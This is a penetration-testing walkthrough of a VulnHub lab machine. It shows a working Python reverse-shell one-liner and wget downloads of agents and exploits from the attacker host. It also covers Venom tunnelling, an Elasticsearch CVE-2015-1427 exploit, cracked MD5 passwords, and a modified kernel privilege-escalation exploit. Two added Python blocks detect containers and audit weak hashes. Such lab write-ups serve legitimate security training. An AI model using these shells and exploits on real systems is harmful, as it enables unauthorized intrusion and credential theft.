Let’s hit the target 01

Time: 2022-7-30

0x00 introduction to target

Target address: BoredHackerBlog: Social Network ~ VulnHub

Target difficulty: medium

Recommended virtual machine: VirtualBox

0x01 content introduction

  • Attack methods involved
    • Host discovery
    • Port scan
    • Service discovery
    • Path crawling
    • Code injection
    • Shell script
    • Intranet information collection
    • Intranet penetration
    • Vulnerability exploitation
    • Password cracking
    • Local privilege escalation
    • Exploit code modification

0x02 environment setup

Download the target .ova file and import it into VirtualBox

Make sure the target and Kali are in the same network segment

Kali IP address: 10.0.2.5

0x03 host discovery

Because the target and Kali are in the same network segment, layer-2 host discovery is the preferred technique

Execute command: sudo arp-scan -l

A total of 4 IP addresses are found. The first three are addresses VirtualBox itself needs for normal operation, so only the last one, 10.0.2.15, is the IP of the target

After getting the target's IP, 10.0.2.15, scan the full port range to find out which ports and services are open on the target

Execute command: sudo nmap -p- 10.0.2.15

The scan results show that the target has two open ports; next, detect the service versions on these two ports

Execute command: sudo nmap -p22,5000 -sV 10.0.2.15

From the scan results, it can be concluded that

  • Port 22 is running an OpenSSH service, and the target should be an Ubuntu operating system

  • Port 5000 is running an httpd service; searching for the Werkzeug keyword shows that this is the underlying framework of a web application developed in Python. This means the server-side programming language environment is Python 2.7, so if a code execution vulnerability is found later, a Python script can be used to get a reverse shell and gain control

Since a web application is running, open the browser and visit the site to see whether there is a default page. If there is one, check whether it has an injection point

Visit: http://10.0.2.15:5000

It can be seen that this is a social networking site. A simple security check finds no obvious known vulnerabilities in the default page and no cross-site scripting vulnerabilities, so there is no gain here

When penetration testing web applications, one routine operation that must be done is web application path discovery: checking whether hidden paths and hidden pages contain a submission point of some function or other vulnerabilities

There are many tools for crawling web application paths, for example Mitsurugi on the Windows platform; on Kali this time the dirsearch tool is used

By crawling the web application paths we are likely to find the admin (background) address, and attacking the admin area is very likely to help us find the breakthrough point into the target system

Execute command: dirsearch -u http://10.0.2.15:5000/

After scanning, one path is found. Use the browser to access it: http://10.0.2.15:5000/admin

Visiting it shows that this is a code execution page. Combined with the information collected above, we know that the server is running a Python 2.7 environment, so we can try injecting Python code to get a reverse shell

0x04 Python bounce shell

Searching for "Python reverse shell" with a search engine finds many articles, for example: Python bounce shell_ Rebound shell summary_ Hepu's blog CSDN blog

# The general meaning of the red-box part is: create an interactive sh and a TCP connection to 192.168.118.128, then redirect sh's input, output and errors to the process listening on port 5555 at 192.168.118.128

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);  # create socket; AF_INET (TCP/IP, IPv4); SOCK_STREAM (TCP stream)
s.connect(("192.168.118.128",5555));  # IP address and port to connect to
os.dup2(s.fileno(),0);  # os.dup2() copies one file descriptor fd onto another descriptor fd2
os.dup2(s.fileno(),1);  # fileno() returns the integer file descriptor, usable for low-level OS I/O operations
os.dup2(s.fileno(),2);  # os.dup2(s.fileno(), 0) copies the socket's descriptor onto descriptor 0; the three dup2 calls redirect the socket to stdin, stdout and stderr in turn
p=subprocess.call(["/bin/sh","-i"]);  # subprocess.call() runs the command given as its argument and returns the command's status, 0 or non-0
                                      # can be ["/bin/bash","-i"] or ["/bin/sh","-i"]

The reference is as follows

Check Kali's own IP

Execute command: ip a

Use nc to start listening

Execute command: nc -nvlp 4444

Then execute the Python reverse shell code on the web page; here only ["/bin/sh","-i"] runs successfully. Remember to change the IP address to Kali's IP address and the port to the nc listening port

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

After clicking the Test code button on the page, the nc listener responds and a reverse shell is obtained

Simply run a few commands to view the current path and account permissions

Fortunately, root permission was obtained, but is that really the case?

0x05 determine whether we are inside a docker container

A Dockerfile is a text file used to build images; its content is the sequence of instructions and descriptions required to build the image.

A Dockerfile is usually used as a template file for the standardized deployment of docker containers in production and development environments. This template contains a series of information about how to import the docker image, how to configure it, what software packages to install, what service items to modify, etc. As a developer, you can distribute the template to the application's deployment personnel so that docker containers can be deployed on production servers in a unified, standardized and consistent way at scale. In a word, a Dockerfile is a template file for standardized deployment.

While running ls, a Dockerfile was seen. Does it mean that the operating system on which root permission was obtained is actually a system inside a docker container?

Check the content of the Dockerfile

Execute command: cat Dockerfile

# docker build -t socnet .
# docker run -td --rm -p 8080:8080 socnet
# FROM: pull the image from Docker Hub or the local repository as the base image; alpine is a suitable base image at under 5 MB
FROM python:2.7-alpine
# COPY: copy files or directories into the container, similar to ADD but without the automatic download or decompression
COPY . /app
# WORKDIR: switch the working directory for the instructions that follow
WORKDIR /app
# RUN: execute a command in a new layer on top of the current image and commit the result; the committed image is used by the next Dockerfile instruction
RUN pip install -r requirements.txt
# CMD: the command the container starts with; if there are several, the last one wins; it can also supply parameters to ENTRYPOINT
CMD ["python", "/app/main.py"]

Reference: Access road of dockerfile_ Peithon's blog CSDN blog_ dockerfile run

It can be seen that the content of this Dockerfile is a standard Dockerfile template, which deepens the suspicion that this is a docker system

To confirm it, here are two methods (commands) for telling that this is a docker container

  1. Method 1 (90%): check whether the .dockerenv file exists in the root directory of the system, execute command: ls /.dockerenv

  2. Method 2 (100%): view the /proc/1/cgroup file, execute command: cat /proc/1/cgroup

    If something like the following appears, you can be 100% sure that this is a docker container system, and the hash value of the docker container follows after the docker keyword

    Reason: after the Linux system starts, PID 1 represents the init process of the system. When the cgroup file of the init PID clearly contains docker image information, it is 100% proof that the current system is a docker container

This is the definitive proof: the root account permission obtained is inside a docker container
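Both checks above can be scripted so that an operator (or a monitoring agent) can tell at a glance whether a shell landed inside a container. This is an added example written for this write-up, not the author's code; the container id and the /proc/1/cgroup excerpts are constructed samples, and the cgroup v2 caveat in the comments is the check a practitioner would want to know about.

```python
import os
import re

# Constructed 64-hex-char container id, the kind of value that follows the
# word "docker" in /proc/1/cgroup inside a container (made up for this example).
SAMPLE_ID = "0123456789abcdef" * 4

# Constructed excerpt of /proc/1/cgroup as seen inside a Docker container
# on a cgroup v1 host: each controller path ends in /docker/<id>.
SAMPLE_CGROUP_CONTAINER = (
    "12:devices:/docker/%s\n"
    "11:memory:/docker/%s\n"
    "1:name=systemd:/docker/%s\n" % (SAMPLE_ID, SAMPLE_ID, SAMPLE_ID)
)

# On a systemd host running cgroup v2 the same file uses a scope name instead.
SAMPLE_CGROUP_V2_CONTAINER = "0::/system.slice/docker-%s.scope\n" % SAMPLE_ID

# Constructed excerpt of /proc/1/cgroup on a normal host (no container).
SAMPLE_CGROUP_HOST = "12:devices:/\n11:memory:/init.scope\n1:name=systemd:/init.scope\n"

# Matches "docker/<id>" (cgroup v1) or "docker-<id>.scope" (cgroup v2 + systemd).
DOCKER_ID = re.compile(r"docker[/-]([0-9a-f]{12,64})")


def container_id_from_cgroup(text):
    """Return the Docker container id named in /proc/1/cgroup text, or None."""
    for line in text.splitlines():
        m = DOCKER_ID.search(line)
        if m:
            return m.group(1)
    return None


def dockerenv_present(root="/"):
    """Method 1 from the write-up: the .dockerenv marker file exists under root."""
    return os.path.exists(os.path.join(root, ".dockerenv"))


def is_in_docker_container(root="/", cgroup_path="/proc/1/cgroup"):
    """Combine both checks on the live system.

    Caveat: with cgroup v2 and a private cgroup namespace the file can read
    just "0::/" inside the container, so a negative cgroup result alone is
    not proof of running on bare metal; the marker file check still helps.
    """
    if dockerenv_present(root):
        return True
    try:
        with open(cgroup_path) as f:
            return container_id_from_cgroup(f.read()) is not None
    except OSError:
        return False


if __name__ == "__main__":
    print("sample v1 id:", container_id_from_cgroup(SAMPLE_CGROUP_CONTAINER))
    print("sample host id:", container_id_from_cgroup(SAMPLE_CGROUP_HOST))
    print("this system in docker:", is_in_docker_container())
```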

0x06 intranet host discovery

View the IP address of the current docker container system

Execute command: ip a

The IP address obtained is 172.17.0.2, different from the target IP attacked before, 10.0.2.15, which further confirms that this is a docker container system, because the two IP addresses differ

Now the network segment where the docker container sits can be regarded as the intranet segment. The common next step is to find out whether there are other hosts in the intranet. If there are, do they have known vulnerabilities? Can these vulnerabilities be used to attack more intranet systems?

To discover hosts in the intranet: the target does not have as many tools as Kali, so the ping command is more appropriate. The subnet mask is 16 bits, so theoretically there are 65535 IP addresses. Pinging them one by one manually is unrealistic and needs the help of automation; a relatively simple method is to write a script that pings the specified intranet segment in a loop

# Scan 172.17.1.1 - 172.17.254.254 and print the addresses that reply
for i in $(seq 1 254); do for j in $(seq 1 254); do ping -c 1 172.17.$i.$j | grep "ttl"; done; done

Because there are not that many targets here

Execute command: for i in $(seq 1 10); do ping -c 1 172.17.0.$i | grep "ttl"; done

After the scan, excluding 172.17.0.2, which is the machine itself, a total of 2 live IP addresses are found. Next, port-scan 172.17.0.1 and 172.17.0.3 to see what services they run, whether there are vulnerabilities, and whether they can be penetrated

0x07 intranet penetration

Because 172.17 is an intranet segment, Kali cannot access it directly. To solve this, intranet pivoting techniques are needed to connect a network route between Kali and the 172.17 intranet

Using venom, a tunnel between Kali and the intranet can easily be established, and then a proxy can be generated on top of this tunnel, so that many tools in Kali can access the target's intranet through this proxy

venom tool GitHub address: GitHub – Dliv3/Venom: Venom – A Multi-hop Proxy for Penetration Testers

First download the venom archive to Kali and unpack it

View the version of the target system

Execute command: uname -a

The target system is 64-bit Linux, so select the agent_linux_x64 program in venom

Transfer the agent_linux_x64 client to the target system, and run the corresponding server, admin_linux_x64, on the local machine

Run admin_linux_x64 locally on Kali, listening on port 9999

Execute command: ./admin_linux_x64 -lport 9999

The target system needs to obtain the venom client and then run it to connect to the server, so as to establish the tunnel

Start an HTTP service on Kali, then use the wget command on the target system to fetch the agent_linux_x64 client program

Start the HTTP service on Kali and execute the command: python3 -m http.server 80

The target system uses wget to fetch the client program

Execute command: wget http://10.0.2.5/agent_linux_x64

Give it executable permission

Execute command: chmod +x agent_linux_x64

Start the client program and connect to the server to establish the connection

Execute command: ./agent_linux_x64 -rhost 10.0.2.5 -rport 9999

The server starts socks listening

This enables a socks5 proxy listening on port 1080 of Kali

For all tools on Kali to use the proxy to access the intranet, the proxychains tool is also needed

Modify the proxychains configuration file to set the proxy type, IP and port

Execute command: sudo vim /etc/proxychains4.conf

0x08 intranet port scanning

Use nmap to port-scan the intranet IPs 172.17.0.1 and 172.17.0.3

Execute command: proxychains nmap -Pn -sT 172.17.0.1

The scan results show that ports 22 and 5000 are open. Scan the service versions of 22 and 5000

Execute command: proxychains nmap -p22,5000 -Pn -sT -sV 172.17.0.1

The scan result looks familiar: it is exactly the same as the result for 10.0.2.15

Visit port 5000 of 172.17.0.1 from Kali through the browser

To switch proxies conveniently, install the FoxyProxy Standard extension in the Firefox browser, extension address: FoxyProxy standard download

Add a Socks5 proxy in the FoxyProxy Standard extension

The browser uses the proxy

Access the intranet address 172.17.0.1:5000

The content displayed is exactly the same as when http://10.0.2.15:5000 was visited before, and even the data from the earlier manual tests can be seen. This shows that 172.17.0.1 is the same host as 10.0.2.15 (the docker host); 172.17.0.1 is simply its IP on the container intranet, so 172.17.0.1 is the target machine to be attacked

Next, continue to scan the ports of 172.17.0.3

Execute command: proxychains nmap -Pn -sT 172.17.0.3

The scan result shows that only port 9200 is open. Scan the service running on this port

Execute command: proxychains nmap -p9200 -Pn -sT -sV 172.17.0.3

According to the scan results, elasticsearch is running on 9200, version 1.4.2

0x09 Elasticsearch RCE

Elasticsearch has had several very serious vulnerabilities in its historical versions, the most serious being several RCE (remote code execution) vulnerabilities

Use searchsploit to check whether Kali contains known elasticsearch exploit code

Execute command: searchsploit Elasticsearch

The first two search results are remote code execution vulnerabilities. Copy these two exploits and try them one by one to see whether the elasticsearch server can be broken into

First try the exploit code 36337.py; copy it to the current directory

Execute command: cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

Briefly read this Python script to see how it exploits the vulnerability

It can be seen that this script is written in Python 2

Run the script, executing: python2 36337.py

The prompt shows that the target IP needs to be appended as an argument

Execute the command again: proxychains python2 36337.py 172.17.0.3

The result comes back quickly; try entering the id command to view the obtained account permissions

Execute command: id

The script exits with an error, so the problem has to be found and fixed. From the prompt information, the vulnerability number is CVE-2015-1427

Search for CVE-2015-1427 with a search engine to see how it is exploited. Reference link: Cve-2015-1427 (groovy sandbox bypass & & Code Execution Vulnerability) – smile 996 – blog Garden (cnblogs.com)

The steps to exploit the vulnerability are

  1. insert data
  2. construct the payload using the data just inserted

Now look again at the exploit code copied from Kali

Execute command: vim 36337.py

Comparing the payload in the reference link with the payload in the Python script, most of the content is the same. The only difference is that the key used in the reference link's payload, test, is inserted into elasticsearch in advance, while the key in the Python script's payload, lupin, is not. If lupin is inserted into elasticsearch first, can the Python script run normally? It is worth trying

Use burpsuite with the Socks5 proxy to send a POST request to elasticsearch and insert the data lupin

First open burpsuite

Check the burpsuite proxy port

Configure burpsuite to use the socks proxy

Configure the browser to use the burpsuite proxy

Access http://172.17.0.3:9200 with the browser

Send the request packet captured by burpsuite to the Repeater module

Modify the HTTP packet content to the format that inserts lupin, and click send

After creation succeeds, try executing the command again: proxychains python2 36337.py 172.17.0.3

The id command executes successfully! Another root account is obtained, but this is only root permission inside the container system

Execute command: cat /proc/1/cgroup

0x0a kernel vulnerability privilege escalation

Searching through the information collected in this container system, a file named passwords was found

Execute command: ls /

Does it contain some more confidential passwords? Out of curiosity

Execute command: cat /passwords

It is found that this is indeed an account and password file, with the account name in front and the hash value of the password behind

Through an MD5 lookup website on the Internet, the plaintext corresponding to every ciphertext was found. Query link: MD5 free online decryption and cracking_ MD5 online encryption -somd5

Account   Password (hash)                   Password (plaintext)
john      3f8184a7343664553fcb5337a3138814  1337hack
test      861f194e9d6118f3d942a72be3e51749  1234test
admin     670c3bbc209a18dde5446e5e6c1f1d5b  1111pass
root      b3d34352fc26117979deabdf1b9b6354  1234pass
jane      5c158b60ed97c723b673529b8a3cf72b  1234jane
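The reason an online table resolved every entry instantly is that the file stores bare, unsalted MD5: one hash call per guess, and the same password always yields the same digest. The script below is an added example written for this write-up from the developer's side, not the author's or the application's code. It parses a file in the same layout (the sample is built from the hashes in the table above), flags every unsalted MD5 entry, and shows the replacement the application should have used: a per-user random salt with PBKDF2-HMAC-SHA256 and constant-time verification. The iteration count is an assumed value.

```python
import hashlib
import hmac
import os
import re

# Sample file in the same "<account> <md5 hex>" layout as the /passwords file
# found on the target. The hashes are the ones listed in the table above; the
# file text itself is constructed for this example.
SAMPLE_PASSWORDS_FILE = """\
john 3f8184a7343664553fcb5337a3138814
test 861f194e9d6118f3d942a72be3e51749
admin 670c3bbc209a18dde5446e5e6c1f1d5b
root b3d34352fc26117979deabdf1b9b6354
jane 5c158b60ed97c723b673529b8a3cf72b
"""

UNSALTED_MD5 = re.compile(r"^[0-9a-f]{32}$")


def parse_password_file(text):
    """Parse "<account> <hash>" lines into a dict; malformed lines are skipped."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            entries[parts[0]] = parts[1].lower()
    return entries


def md5_hex(candidate):
    """Plain MD5 of a candidate password: exactly what a lookup site precomputes."""
    return hashlib.md5(candidate.encode()).hexdigest()


def md5_matches(stored_hash, candidate):
    """Checking an unsalted MD5 against a guess costs a single hash call."""
    return hmac.compare_digest(stored_hash.lower(), md5_hex(candidate))


def audit_weak_hashes(text):
    """Return the accounts whose stored hash is a bare 32-hex-char MD5."""
    entries = parse_password_file(text)
    return sorted(user for user, h in entries.items() if UNSALTED_MD5.match(h))


# --- what the application should store instead ----------------------------
ITERATIONS = 200_000  # assumed work factor; tune to the deployment's hardware


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, encoded as
    'pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>'."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())


def verify_password(stored, candidate):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(dk.hex(), dk_hex)
    except ValueError:  # wrong field count, bad hex or bad iteration count
        return False


if __name__ == "__main__":
    print("unsalted MD5 accounts:", audit_weak_hashes(SAMPLE_PASSWORDS_FILE))
    stored = hash_password("1234pass")
    print(stored)
    print(verify_password(stored, "1234pass"), verify_password(stored, "1234PASS"))
```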

With these accounts and passwords, try logging in to the IP addresses with port 22 open, starting with 10.0.2.15

After trying, I was pleasantly surprised to find that the account john can log in to 10.0.2.15; unfortunately none of the others can

Execute command: ssh john@10.0.2.15

Logged in to the target successfully

The account john is currently the only usable account. See whether this account can be elevated to root; if so, this target will be completed

Execute command: sudo -s

Unfortunately not: no sudo permission

To still obtain root permission, nothing remains but local privilege escalation

There are many ways to escalate privileges locally, but the main way is through kernel vulnerabilities

Check the system kernel and execute the command: uname -a

It can be seen that the kernel version used by the target system is 3.13, a very old version, and such old versions generally have kernel vulnerabilities

Use searchsploit again to search for exploit code for linux 3.13

Execute command: searchsploit linux 3.13

Many results come back; choose a local privilege escalation exploit

In a real penetration scenario and in real project work, many exploit versions may be found at this step, and they need to be tried on the target system one by one

For example, use 37292.c; first copy this exploit to the current directory

Execute command: cp /usr/share/exploitdb/exploits/linux/local/37292.c .

Check the code in this file

Execute command: vim 37292.c

The description shows that this is a C source file, which must be compiled with gcc before running

However, executing gcc on the target system:

The result shows that gcc is not installed on the target system, so it must be compiled on Kali first and then transferred to the target machine to run

Before running any exploit code on the target machine, it is strongly recommended to read the exploit code first

Check the source code again and execute the command: vim 37292.c

Reading the source code reveals

  1. On lines 139-147, the C code runs the gcc command again to compile ofs-lib.c into the ofs-lib.so file, so even if it is compiled in advance on Kali, running it on the target system, where gcc is not installed, will still produce an error. There are many solutions; the relatively simple and direct way is to modify the source code, delete the compilation part, and then look for a ready-made ofs-lib.so file in Kali
  2. Line 148 reads the /tmp/ofs-lib.so file, so when running on the target system, ofs-lib.so must be placed in the /tmp directory for the file to be read successfully

Modify the source file by deleting the original lines 139-147; the modified content is as follows

Compile the modified C source code

Execute command: gcc -o exp 37292.c

Some warnings during compilation are harmless and do not affect the final result

Check whether the ofs-lib.so file exists in Kali

Execute command: locate ofs-lib.so

It turns out that it does exist. Copy it to the current directory

Execute command: cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

Start the HTTP service on Kali and download these two files on the target with the wget command

Start the HTTP service and execute the command: python3 -m http.server 80

The target machine downloads these two files

Execute commands:

  • wget http://10.0.2.5/exp

  • wget http://10.0.2.5/ofs-lib.so

To ensure successful operation, ofs-lib.so must be moved to the /tmp directory; simply move both files to /tmp

Execute command: mv * /tmp

Give exp executable permission

Execute command: chmod +x exp

Run the exp program to escalate privileges

Execute command: ./exp

Congratulations, privileges were successfully escalated to root, and this target is completed!

0x0b summary

  • Text overview of the attack process

    1. First perform host discovery, then port scanning and service scanning on the discovered hosts
    2. After scanning, port 5000 on the target is found to run a web application; try accessing this web application with the browser
    3. There are no known vulnerabilities in the web application's default page. Next, use the dirsearch command to probe the web application's paths
    4. An admin path /admin is found. This admin page has a remote code execution vulnerability; using it, a reverse shell on the target system is obtained
    5. But after getting the shell, I found myself inside a docker container system. From this container system, I discovered the hosts in the intranet IP segment
    6. During intranet host discovery, two IP addresses were identified: 172.17.0.1 and 172.17.0.3
    7. Then an intranet pivoting tunnel was established and a socks proxy opened; through it, all ports and services of the live intranet hosts were scanned
    8. During scanning, it is found that 172.17.0.3 has port 9200 open; the corresponding application is Elasticsearch
    9. An existing vulnerability in Elasticsearch was exploited and the host 172.17.0.3 was successfully taken
    10. Continuing information collection on this host, a file named passwords was found
    11. From the file contents, the account name john and its password hash were learned, and the hash was looked up with an online cracking tool
    12. With the account and password, I tried logging in on all intranet hosts with port 22 open; in the end, the login to the target system succeeded
    13. But after logging in, another problem appeared: the account john is just an ordinary account with no sudo permission
    14. Privilege escalation had to be carried out. uname -a showed that the target's kernel is a very old version, and a kernel exploit was selected
    15. However, this exploit cannot run gcc on the target system, so the source code was modified on Kali to delete the part that calls gcc; after compiling, the dependent binary library file was found in Kali
    16. These two files were transferred to the target system together, and by executing the compiled program on the target system, root permission was finally obtained
  • Video link corresponding to the attack process: Click to view